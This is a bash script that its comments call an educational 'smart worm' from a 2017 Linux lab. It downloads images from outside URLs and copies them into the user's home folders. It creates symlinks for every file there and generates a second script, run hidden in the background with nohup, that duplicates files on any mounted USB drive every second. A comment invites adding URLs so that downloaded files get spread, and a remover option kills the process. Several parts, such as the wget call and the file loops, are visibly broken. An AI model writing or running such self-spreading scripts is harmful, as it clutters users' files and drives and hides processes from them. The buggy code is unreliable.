#!/bin/bash

#A smart worm script created in 2017 in Turkey 29-5-2017 in Linux Lab
#In European training center
#A worm that can be used for edcuational propuses

#When you run this worm feel free to choose your own option to test it 
#When you are done you can remove all the files generated by this worm by choosing the remove virus option


#Return current logged in user name
my=$(whoami)

#Global array to store paths that will be exploited by this virus 
paths=("Desktop" "Documents" "Downloads" "Pictures" "Videos")

#Prompt the user to collect his choice
PS3='Please enter your choice : '
mypattren="LX"

#Create an array for options in select menu
options=("Run" "Virus remover" "quit")

#Global variable - Random file name for the generated script
filename=flash$(((RANDOM % 10)+1)).sh

#Create a function called CreateList 
function CreateList
{

   #Create a list of urls and add them into arraylist
    echo > list.txt
   
   #Create the temp directory when executing the CreateList function to store all downloaded images
   mkdir temp
   
    #Notice: you can add your items  into this arraylist in case you want to download files from the internet then spread them
    arraylist[0]='http://www.ucl.ac.uk/news/news-articles/1215/winner-137.jpg'
    arraylist[1]='http://clipart-library.com/data_images/394814.jpg'
    arraylist[2]='https://www.dreamhost.com/blog/wp-content/uploads/2015/10/DHC_blog-image-01-300x300.jpg'
    arraylist[3]='http://www.tarangarts.com/images/large/Om_1583.jpg'
	
    #loop on the array and write the lines in the list.txt file
    for i in "${arraylist[@]}"
	do
	echo $i >> list.txt
	done
      
}

#Function will call the User Home Directory folders and spread the images
function startspreading
{
echo >log

for itemsNames in temp/*
do
NewFile=$itemsNames$(((RANDOM % 10)+1))
for targets in "${paths[@]}"
do
      cp -v $itemsNames $HOME/$targets >> log

done 
done 
       cat log | grep " ‘"|grep -o -P '.{0,0} ‘.*'|tr -d '‘'|tr -d '’' >log1
       cat log1 >log
       rm log1 
}

function createShortcut
{

for shcut in "${paths[@]}"
do
for file in $HOME/$shcut/*
do   
     echo $file
     ln -s $file $file.link 
done
done

}


#Function to download some urls of images and store in a temp direcotry
function DownloadList 
{
     
     for i in "$(cat list.txt)"
	do
	wget -o temp/$i 
	done
}


#remove all paths that exists in log file
function RemoveVirus
{
for itemsNames in "$(cat log)"
do 
    rm  $itemsNames
     
done 


#Removing links of files
for arrayItem in "${paths[@]}"
do
for  linkItem in $HOME/$arrayItem/*link*
do

#remove all copied items that stored in the log file
rm $linkItem

#remove generated file from this script who control the operations of handling flash memory stuff
rm $filename

#remove the output file of running this script
rm outputvirus

#remove the log file that generated by this script
rm log

#remove list.txt file which contains all downloaded links
rm list.txt

#remove temp directory and if there's any content in it also delete it.
rm -r temp


done
done

 
ps -ef |grep $filename |grep -v grep | awk '{ print $2}' | xargs kill -9
}

function renameDownloadedFiles
{
ss=0
for file in temp/*; do
((ss++))
    mv "$file" "${file/win*/ph}"$mypattren
    #to copy files in the same way you can also use it.
done
}


#generate a random file name .sh then change the mod of it then run it using (nohup) command.
function generate
{
echo  my='$(whoami)' > $filename
echo -e 'function FlashMountMain \n {' >> $filename 
echo  'FlashTrue=$(ls /media/$my | wc -l)' >> $filename
echo   'if (( $FlashTrue > 0 ))' >> $filename
echo -e  'then \n FlashMount \n  else \n echo Please insert flash \n  fi \n }' >> $filename 
echo -e 'function FlashMount \n {' >>$filename

echo 'while sleep 1' >> $filename
echo -e 'do \n for flash in "$(ls /media/$my/)" \n  do' >>$filename
  
echo -e 'for link in  ls /media/$my/$flash/* \n  do' >> $filename
echo   '  echo contents of media $link' >>$filename
echo      'cp  "$link" "$link.lk"' >>$filename
echo -e 'done \n done \n done \n}' >>$filename
echo 'FlashMountMain' >>$filename
chmod +x $filename
}


#Create a menu options for the users when they run this script.
select opt in "${options[@]}"
do
     case $opt in 
      "Run")
	  #create a list of images and save them into an array	
          CreateList
          
	#Download a list of the list.txt file that created by our array
	  DownloadList 
	 
	 #Rename downloaded files using our pattern
          renameDownloadedFiles
         
	 #Start attacking the system
          startspreading
         
	 #Create shortcuts using ln on the system 
	  createShortcut
          
	  #generate another script file from this script then run it to handel the flash memory stuff
	  generate
          
 	  #NO HANG UP COMMAND will create a hidden process for runing the generated script file
          nohup /home/$my/Desktop/$filename > outputvirus 2>&1 & 
          
;;
      "Virus remover")
       RemoveVirus
         
;;

      "quit")
     break
;;
*)
echo invalid choice
      esac
done
